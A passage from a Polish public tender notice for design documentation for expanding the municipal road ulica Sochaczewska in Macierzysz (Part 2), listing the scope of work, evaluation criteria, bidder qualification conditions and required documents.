<h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">,,Zielone kryterium” tj. posiadanie certyfikatu wg normy ISO 14001 lub EMAS</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia obejmuje:<br/>a) wykonanie dokumentacji projektowej wraz z uzyskaniem wszelkiej dokumentacji formalno-prawnej umożliwiającej<br/>zrealizowanie inwestycji polegającej na:<br/>Cz. B – rozbudowie drogi gminnej ulicy Sochaczewskiej w Macierzyszu<br/>b) uzyskanie pozwolenia na budowę lub decyzji na realizację inwestycji drogowej lub zgłoszenia robót budowlanych<br/>2. Przedmiot zamówienia obejmuje w szczególności:<br/>- wykonanie koncepcji projektowej,<br/>- wykonanie projektów budowlano – wykonawczych we wszystkich branżach niezbędnych do realizacji zadania (np.<br/>drogowej, kanalizacyjnej, energetycznej, telekomunikacyjnej i innych wymaganych) projekty zagospodarowania terenu,<br/>Specyfikacja Wykonania i Odbioru Robót, przedmiar robót, kosztorys inwestorski, projekt stałej i czasowej zmiany<br/>organizacji ruchu, materiały do wniosku o wydanie decyzji zezwalającej na realizację inwestycji drogowej lub/i pozwoleniu na<br/>budowę lub/i zgłoszenia robót budowlanych,<br/>- uzyskanie wymaganych prawem warunków technicznych, opinii, uzgodnień, zgód, pozwoleń, decyzji administracyjnych (w<br/>tym ZRID i dotyczących niezbędnej wycinki drzew i krzewów), zezwoleń w szczególności wynikających z ustawy prawo<br/>budowlane<br/>- podzielenie dokumentacji na odrębne opracowania w celu uzyskania decyzji administracyjnych, pozwalających na<br/>realizację robót budowlanych, u odpowiednich organów administracji państwowej i samorządowej, wg ich kompetencji, w<br/>szczególności na odrębne opracowania wynikające z przebiegu granic pasów drogowych oraz własności terenu,<br/>- wykonanie własnym staraniem i na własny koszt wszelkiego rodzaju pomiarów, map, badań geotechnicznych,<br/>inwentaryzacji oraz innych czynności i dokumentów a także uzyskania wszelkich dokumentów i decyzji w tym warunków<br/>technicznych, decyzji administracyjnych, opinii, uzgodnień, zgód a także ekspertyz, badań, które zgodnie z powszechnie<br/>obowiązującymi przepisami prawa okażą się niezbędne do wykonania dokumentacji i pozwolą Zamawiającemu na realizację<br/>zadań,<br/>- udzielenie pełnych wyjaśnień dotyczących dokumentacji projektowo-kosztorysowej na etapie wykonywania projektów,<br/>postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych w terminie maksymalnie 2 dni od<br/>wezwania przez Zamawiającego pocztą elektroniczną,<br/>- opracowanie dokumentacji zaopatrzonej w wykaz opracowań oraz pisemne oświadczenie Wykonawcy, że została<br/>wykonana zgodnie z Umową, zgodnie z obowiązującymi przepisami techniczno-budowlanymi oraz, że jest kompletna z<br/>punktu widzenia celu, któremu ma służyć, a ponadto, że kosztorysy inwestorskie są aktualne według stanu na dzień<br/>podpisania przez strony protokołu zdawczo-odbiorczego potwierdzającego ich przekazanie Zamawiającemu,<br/>- usunięcie wad dokumentacji, w tym usunięcie jej braków, dokonanie jej uzupełnień bądź wprowadzenie w niej innych<br/>zmian – w przypadku zgłoszenia zastrzeżeń do tej dokumentacji przez Zamawiającego lub inne uprawnione Organy – bez<br/>dodatkowego wynagrodzenia.<br/>3. Zakres zadania inwestycyjnego może ulec zmianie, o ile wyniknie to z ustaleń i uzgodnień dokonywanych w trakcie<br/>wykonywania przedmiotu zamówienia, w szczególności ustaleń z Zamawiającym, na etapie uzgadniania rozwiązań<br/>projektowych/koncepcji, gdy zakres przedmiotu zamówienia będzie pozostawał w kolizji z obowiązującymi przepisami prawa<br/>lub normami budowlanymi, bądź też z innych przyczyn ich uwzględnienie nie będzie pozwalało na prawidłowe, wedle<br/>najlepszej wiedzy Zamawiającego lub Wykonawcy, wykonanie Umowy, Wykonawca zobowiązany jest zaproponować<br/>rozwiązanie zamienne.<br/>UWAGA: Przed rozpoczęciem prac projektowych, najpóźniej na 3 dni przed podpisaniem umowy należy przedstawić<br/>Zamawiającemu harmonogram rzeczowo-finansowy opracowywania dokumentacji.<br/>4. Zakres przedmiotu zamówienia składa się z opracowania:<br/>a) koncepcji projektowej obejmującej m.in.:<br/>- wskazanie nieruchomości objętych inwestycją<br/>- wskazanie kolizji z sieciami technicznymi i sposobu ich usunięcia<br/>- propozycję podziału procedur administracyjnych (w przypadku, gdy Wykonawca uzna zasadność rozdziału dokumentacji<br/>projektowych w celu niezależnego uzyskania pozwoleń, dokonania zgłoszeń robót budowlanych bądź wskazania zakresu<br/>prac niewymagających pozwolenia/zgłoszenia)<br/>- harmonogram opracowania projektu - opracowanie dokumentacji projektowej ze wskazaniem \ poszczególnych branż<br/>projektowych<br/>- ustalenie szacunkowego kosztu realizacji inwestycji w rozbiciu na poszczególne branże.<br/>b) wielobranżowej dokumentacji projektowej obejmującej min.:<br/>- projekty budowlane i wykonawcze we wszystkich branżach określonych w koncepcji,<br/>- projekty podziału,<br/>- Projekty rozbiórek wszelkich obiektów budowlanych koniecznych dla realizacji zadania, a wynikających z koncepcji,<br/>- kosztorysy inwestorskie, przedmiary oraz BIOZ i STWiORB,<br/>- wykonanie projektów z zapewnieniem dostępności obiektów dla osób niepełnosprawnych z dysfunkcjami ruchu, widzenia i<br/>słuchu oraz projektowania uniwersalnego.<br/>c) pełnienie nadzoru autorskiego w trakcie realizacji inwestycji, w przypadku wystąpienia braków lub błędów w dokumentacji<br/>projektowej, konieczności wykonania dodatkowych opracowań, a także w przypadku konieczności sporządzenia<br/>dokumentacji zamiennej, ich wykonania w ramach kwoty umownej wynagrodzenia nadzoru autorskiego.<br/>5. Zamawiający, zgodnie z art. 100 ust. 1 ustawy Pzp, wymaga aby niniejsze zamówienie - wykonanie dokumentacji<br/>projektowej, stanowiące opis przyszłego przedmiotu zamówienia na realizację robót dotyczących dróg, jako zamówienie<br/>przeznaczone do użytku osób fizycznych, spełniało wymagania w zakresie dostępności dla wszystkich użytkowników, w tym<br/>dla osób niepełnosprawnych. Wymagane jest opracowanie dokumentacji projektowej, zawierającej postanowienia do<br/>zrealizowania przyszłego zamówienia w taki sposób, aby osoby fizyczne wymienione powyżej mogły korzystać z niego bez<br/>żadnych utrudnień i ograniczeń. Szczegółowe zapisy dotyczące przeznaczenia projektowanego przyszłego przedmiotu<br/>zamówienia dla wszystkich<br/>użytkowników, w tym dla osób niepełnosprawnych Wykonawca zobowiązany jest określić w opracowanej dokumentacji<br/>projektowej, zgodnie z wymogami prawa, w tym ustawy Pzp.<br/>6. Realizując zamówienie Wykonawca zobowiązany jest do zapewnienia – w zakresie odpowiadającym przedmiotowi<br/>zamówienia i jego właściwościom - dostępności (architektonicznej, cyfrowej oraz informacyjno-komunikacyjnej) osobom ze<br/>szczególnymi potrzebami, co najmniej w zakresie określonym przez minimalne wymagania, o których mowa w art. 6 ustawy<br/>z dnia 19 lipca 2019 roku o zapewnieniu dostępności osobom ze szczególnymi potrzebami.<br/>7. Szczegółowy opis zakresu przedmiotu zamówienia zawarty został w niniejszej SWZ oraz w załączniku Nr 1 do SWZ, na<br/>który składają się opis przedmiotu zamówienia oraz mapy określające zakres drogi gminnej do zaprojektowania. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 167586,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający<br/>przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, tzn. polegających na powtórzeniu podobnych<br/>usług, stanowiących niniejsze zamówienie podstawowe<br/>- Wartość usług, o których mowa powyżej może wynieść maksymalnie do 30 % wartości zamówienia podstawowego<br/>- Warunki na jakich zostaną udzielone powyższe usługi – będą zgodne z przedmiotem zamówienia podstawowego.<br/><br/>Zamówienie podobne rozliczane będzie na warunkach ustalonych w wyniku negocjacji z wykonawcą i będzie<br/>obejmowało wymagania nie gorsze niż ustalone względem zamówienia podstawowego z uwzględnieniem faktu,<br/>że w sytuacji zwiększenia (np. robót budowlanych) wybranych pozycji kosztorysowych wymagane jest<br/>przedłożenie przez Wykonawcę wyliczeń popartych dowodami na to, że wzrost cen i kosztów ma wpływ<br/>na realizację robót</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny kryterium ceny z dokładnością do dwóch miejsc po przecinku zgodnie z<br/>zasadami matematycznymi, w kryterium doświadczenie osób wyznaczonych do realizacji zamówienia przyznane zostaną punkty<br/>całkowite (0,20,35), w „zielonym kryterium” tj. posiadanie certyfikatu wg normy ISO 14001 lub EMAS przyznane zostaną punkty<br/>całkowite (0, 5)<br/>2. Zamawiający wybierze ofertę najkorzystniejszą spośród nieodrzuconych ofert na podstawie kryterium ceny, doświadczenia osób<br/>wyznaczonych do realizacji zamówienia, „zielonego kryterium” tj. posiadanie certyfikatu wg normy ISO 14001 lub EMAS<br/>3. Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę punktów przyznanych w każdym<br/>kryterium z uwzględnieniem wagi procentowej danego kryterium.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">,,Zielone kryterium” tj. posiadanie certyfikatu wg normy ISO 14001 lub EMAS</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki, o których mowa w art. 112 ust.2 ustawy,<br/>którzy:<br/>a) nie podlegają wykluczeniu (na podstawie zapisów w pkt. 21 SWZ, dotyczących podstaw wykluczenia)<br/>b) spełniają następujące warunki udziału w postępowaniu w zakresie:<br/>1) zdolności do występowania w obrocie gospodarczym,<br/>(Zamawiający nie precyzuje tego warunku);<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>(Zamawiający nie precyzuje tego warunku);<br/>3) sytuacji ekonomicznej lub finansowej<br/>( dotyczy cz. A i/lub B zamówienia ):<br/>Zamawiający wymaga - aby Wykonawca wykazał, że posiada środki finansowe lub zdolność kredytową - w kwocie minimum<br/>10.000,00 zł<br/>4) zdolności technicznej lub zawodowej<br/>( dotyczy cz. A i/lub B zamówienia ):<br/>Zamawiający wymaga aby Wykonawca:<br/>a. wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje - w okresie ostatnich 3 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy, to w tym okresie - minimum 3 zamówienia, polegające na opracowaniu dokumentacji<br/>projektowo-kosztorysowej dotyczącej budowy/rozbudowy/przebudowy dróg/ulic wraz z sieciami, na które Wykonawca w<br/>imieniu inwestora lub inwestor, pozyskał ostateczną decyzję o pozwoleniu na budowę lub dokonał skutecznego zgłoszenia<br/>robót (tj. przyjętego bez sprzeciwu)<br/>- mając na uwadze treść art. 117 ust. 1 ustawy Pzp, w sytuacji składania oferty przez dwa lub więcej podmiotów<br/>(Wykonawcy wspólnie ubiegający się o udzielenie zamówienia) oraz analogicznie w sytuacji, gdy Wykonawca będzie<br/>polegał na zasobach innego podmiotu, na zasadach określonych w art. 118 ustawy Pzp, warunek o którym mowa powyżej<br/>musi zostać spełniony w całości przez Wykonawcę (jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na<br/>którego zdolności w tym zakresie powołuje się Wykonawca – brak możliwości tzw. sumowania doświadczenia<br/>b. skierował do realizacji zamówienia publicznego osoby:<br/>( dotyczy cz. A i/lub B zamówienia ):<br/>- min. 1 (koordynator projektu) posiadający uprawnienia do projektowania w specjalności inżynieryjnej drogowej bez<br/>ograniczeń. W/w koordynator projektu musi posiadać doświadczenie w wykonaniu min. 3 dokumentacji dotyczących<br/>budowy/rozbudowy/przebudowy dróg/ulic wraz z sieciami, z ostateczną decyzją o pozwoleniu na budowę lub skutecznym<br/>dokonaniem zgłoszenia robót (tj. przyjęte bez sprzeciwu), lub pozyskał ostateczną decyzję o zezwoleniu na realizację<br/>inwestycji drogowej. W tym postępowaniu doświadczenie osoby wyznaczonej do realizacji zamówienia stanowi kryterium<br/>oceny ofert.<br/>Wymagane jest: doświadczenie – min. 3 lata stażu zawodowego po uzyskaniu uprawnień do projektowania w/w branży,<br/>wymaganych przepisami ustawy Prawo budowlane,<br/>- min. 1 projektanta posiadającego uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń telekomunikacyjnych bez ograniczeń (wymagane min. 3-letnie doświadczenie oraz oświadczenie o posiadaniu<br/>uprawnień do projektowania w/w branży),<br/>- min. 1 projektanta posiadającego uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci i instalacji i<br/>urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń<br/>(wymagane min. 3-letnie doświadczenie oraz oświadczenie o posiadaniu uprawnień do projektowania w/w branży),<br/>- min. 1 projektanta posiadającego uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci i instalacji i<br/>urządzeń elektrycznych i elektroenergetycznych bez ograniczeń (wymagane min. 3 -letnie doświadczenie oraz oświadczenie<br/>o posiadaniu uprawnień do projektowania w/w branży),<br/>Zamawiający dopuszcza możliwość łączenia stanowisk projektantów w wypadku posiadania przez nich więcej niż jednej<br/>specjalności.<br/>Dla osób odpowiedzialnych za realizację zamówienia Zamawiający dopuszcza ważne uprawnienia do projektowania,<br/>odpowiadające wymienionym wyżej uprawnieniom, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów. Samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą<br/>również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w<br/>przepisach odrębnych tj. m.in. w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych<br/>w państwach członkowskich Unii Europejskiej (Dz.U. z 2023 r. poz. 334) oraz w rozumieniu art. 20 a ust. 1 ustawy z dnia 15<br/>grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2023 r. poz. 551) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) odpis lub informacja z<br/>Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4<br/>ustawy Pzp, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji<br/>*Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentów, o<br/>których mowa powyżej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, że: nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju<br/>sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Jeżeli w kraju, w którym<br/>Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument<br/>dotyczy nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je odpowiednio w całości lub w części dokumentem<br/>zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub<br/>oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę<br/>lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument miał dotyczyć nie ma przepisów o oświadczeniu pod<br/>przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania ma osoba,<br/>której dokument miał dotyczyć. Zastępczy dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3<br/>miesiące przed jego złożeniem.<br/>Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składają wymagane przez<br/>Zamawiającego dokumenty zgodnie z rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.<br/>U. poz. 2415)<br/>b) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616), z innym wykonawcą,<br/>który złożył odrębną ofertę/ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty/oferty częściowej niezależnie od innego wykonawcy należącego do tej<br/>samej grupy kapitałowej<br/>c) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego w pkt 22 SWZ, o którym mowa w § 2 ust. 1 pkt 7<br/>oraz § 3 rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">(przy składaniu oferty na część A i/lub B):<br/>a) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich<br/>3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie potwierdzający wykonanie - min. 3 zamówień, polegających<br/>na opracowaniu dokumentacji projektowo-kosztorysowej dotyczącej budowy/rozbudowy/przebudowy dróg/ulic wraz z sieciami, na<br/>które Wykonawca w imieniu inwestora lub inwestor, pozyskał ostateczną decyzję o pozwoleniu na budowę lub dokonał skutecznego<br/>zgłoszenia robót (tj. przyjętego bez sprzeciwu), wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi<br/>te zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy usługi zostały wykonane lub są<br/>wykonywane należycie.<br/>Dowodami w przypadku zamówień na usługi są:<br/>– referencje,<br/>– inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających<br/>się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów<br/>to oświadczenie Wykonawcy,<br/>Uwaga! W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy, licząc wstecz od dnia złożenia ofert<br/><br/>* (przy składaniu oferty na część A i/lub B):<br/>b) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami:<br/>- min. 1 (koordynator projektu) posiadający uprawnienia do projektowania w specjalności inżynieryjnej drogowej bez ograniczeń.<br/>W/w koordynator projektu musi posiadać doświadczenie w wykonaniu min. 3 dokumentacji dotyczących<br/>budowy/rozbudowy/przebudowy dróg/ulic wraz z sieciami, z ostateczną decyzją o pozwoleniu na budowę lub skutecznym<br/>dokonaniem zgłoszenia robót (tj. przyjęte bez sprzeciwu), lub pozyskał ostateczną decyzję o zezwoleniu na realizację inwestycji<br/>drogowej. W tym postępowaniu doświadczenie osoby wyznaczonej do realizacji zamówienia stanowi kryterium oceny ofert.<br/>Wymagane jest: doświadczenie – min. 3 lata stażu zawodowego po uzyskaniu uprawnień do projektowania w/w branży,<br/>wymaganych przepisami ustawy Prawo budowlane,<br/>- min. 1 projektanta posiadającego uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>telekomunikacyjnych bez ograniczeń (wymagane min. 3 -letnie doświadczenie oraz oświadczenie o posiadaniu uprawnień do<br/>projektowania w/w branży),<br/>- min. 1 projektanta posiadającego uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci i instalacji i urządzeń<br/>cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń (wymagane min. 3-letnie doświadczenie<br/>oraz oświadczenie o posiadaniu uprawnień do projektowania w/w branży),<br/>- min. 1 projektanta posiadającego uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci i instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń (wymagane min. 3 -letnie doświadczenie oraz oświadczenie o posiadaniu<br/>uprawnień do projektowania w/w branży),<br/>Zamawiający dopuszcza możliwość łączenia stanowisk projektantów w wypadku posiadania przez nich więcej niż jednej<br/>specjalności.<br/>CIĄG DALSZY W SEKCJA IX – &#34;POZOSTAŁE INFORMACJE&#34;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> dokumenty dotyczące przedmiotu zamówienia – przedmiotowe środki dowodowe służące potwierdzeniu zgodności z<br/>cechami lub kryteriami określonymi w opisie kryteriów oceny ofert:<br/>kopia certyfikatu ISO 14001 lub EMAS lub równoważnego dokumentu (np.: zaświadczenia niezależnego podmiotu<br/>uprawnionego do kontroli jakości);<br/>Uwagi do przedmiotowych środków dowodowych, o których mowa w art. 104-107 ustawy Pzp,:<br/>- Zamawiający akceptuje także równoważne przedmiotowe środki dowodowe, jeżeli potwierdzają, że oferowane usługi<br/>spełnią określone przez Zamawiającego wymagania, cechy lub kryteria,<br/>- jeżeli w niniejszym postępowaniu Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe<br/>środki dowodowe są niekompletne, Zamawiający z uwagi na treść art. 107 ust. 3 ustawy Pzp nie będzie wzywał do ich<br/>złożenia lub uzupełnienia,<br/>- Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/>- przedmiotowe środki dowodowe sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski<br/>Dokument ten będzie załącznikiem Nr 5 do oferty. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a) *Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego do złożenia oferty musi być<br/>złożone w oryginale w takiej samej formie jak składana oferta (tj. w formie elektronicznej lub w postaci elektronicznej,<br/>opatrzonej podpisem kwalifikowanym, podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie<br/>elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego<br/>poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego1991 r. – prawo o notariacie, które to<br/>poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym bądź też poprzez opatrzenie skanu<br/>pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez<br/>upełnomocnionego. (*jeżeli dotyczy)<br/>Dokument ten będzie załącznikiem Nr 2 do oferty.<br/>b) *Zobowiązanie podmiotów, na których zdolnościach technicznych, zawodowych, sytuacji finansowej lub ekonomicznej<br/>polega Wykonawca do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>zamówienia podpisane: kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym podmiotu<br/>udostępniającego zasoby. (*jeżeli dotyczy)<br/>Dokument ten będzie załącznikiem Nr 3 do oferty.<br/>c) *Oświadczenie, z którego wynika które usługi wykonają poszczególni Wykonawcy składający ofertę wspólnie, podpisane<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym (*jeżeli dotyczy)<br/>Dokument ten będzie załącznikiem Nr 4 do oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 58 ust. 1 ustawy Pzp. Wykonawcy<br/>występujący wspólnie zobowiązani są dołączyć do oferty dokument (pismo, oświadczenie)<br/>wskazujący ustanowionego pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia<br/>publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument ten<br/>musi być wystawiony zgodnie z wymogami ustawowymi, podpisany przez prawnie upoważnionych przedstawicieli<br/>wszystkich Wykonawców wspólnie 